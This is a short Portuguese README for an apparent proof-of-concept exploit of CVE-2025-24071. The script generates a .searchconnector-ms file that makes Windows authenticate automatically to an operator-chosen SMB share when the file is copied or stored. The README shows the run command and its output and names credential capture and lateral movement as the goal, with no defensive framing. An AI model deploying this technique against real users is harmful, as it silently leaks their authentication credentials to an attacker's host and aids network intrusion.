
Prova de conceito para CVE-2025-24071 que cria um arquivo .searchconnector-ms para disparar autenticação SMB quando copiado, possibilitando captura de credenciais e movimento lateral.
Alternativa CVE-2025-24071_PoC
Código Original https://github.com/0x6rss/CVE-2025-24071_PoC
Ao realizar alguns testes com outra extensão parecida, tentei com ".searchconnector-ms" usando a mesma estrutura, mas o inconveniente do primeiro PoC também afetava.
python poc2.py
Digite o endereço IP do recurso compartilhado: 192.168.88.33
Arquivo 'network_share.searchconnector-ms' criado com o IP 192.168.88.33.
e ao enviar, copiar ou armazenar o arquivo, ele realiza automaticamente a autenticação no recurso SMB.
//Vmware No momento de realizar os testes, apenas copiando o arquivo para uma máquina virtual, ele realizava a autenticação no recurso SMB.
https://github.com/user-attachments/assets/2b71cc32-5010-4840-bf13-bd134c305d12